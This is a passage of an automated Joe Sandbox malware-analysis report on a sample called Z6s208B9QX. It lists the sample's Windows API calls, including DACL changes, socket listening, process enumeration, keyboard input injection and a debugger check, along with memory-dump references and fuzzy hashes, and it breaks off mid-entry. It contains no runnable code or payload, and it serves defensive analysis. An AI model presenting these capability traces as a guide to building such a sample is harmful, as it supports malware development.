                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1255039815-0
                                                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                        Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                        • String ID:
                                                                                                        • API String ID: 1158019794-0
                                                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                        Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1737998785-0
                                                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                        Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                        • API String ID: 4194297153-14809454
                                                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                        Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_strncmp
                                                                                                        • String ID: @oH$\$^$h
                                                                                                        • API String ID: 2175499884-3701065813
                                                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                        Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 540024437-0
                                                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                        Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                        • API String ID: 0-2872873767
                                                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                        Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547909840-0
                                                                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                        Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                        • String ID: *.*$\VH
                                                                                                        • API String ID: 2786137511-2657498754
                                                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                        Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID: pqI
                                                                                                        • API String ID: 2579439406-2459173057
                                                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                        Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicollmouse_event
                                                                                                        • String ID: DOWN
                                                                                                        • API String ID: 1033544147-711622031
                                                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                        Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3031425849-0
                                                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                        Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 4170576061-0
                                                                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
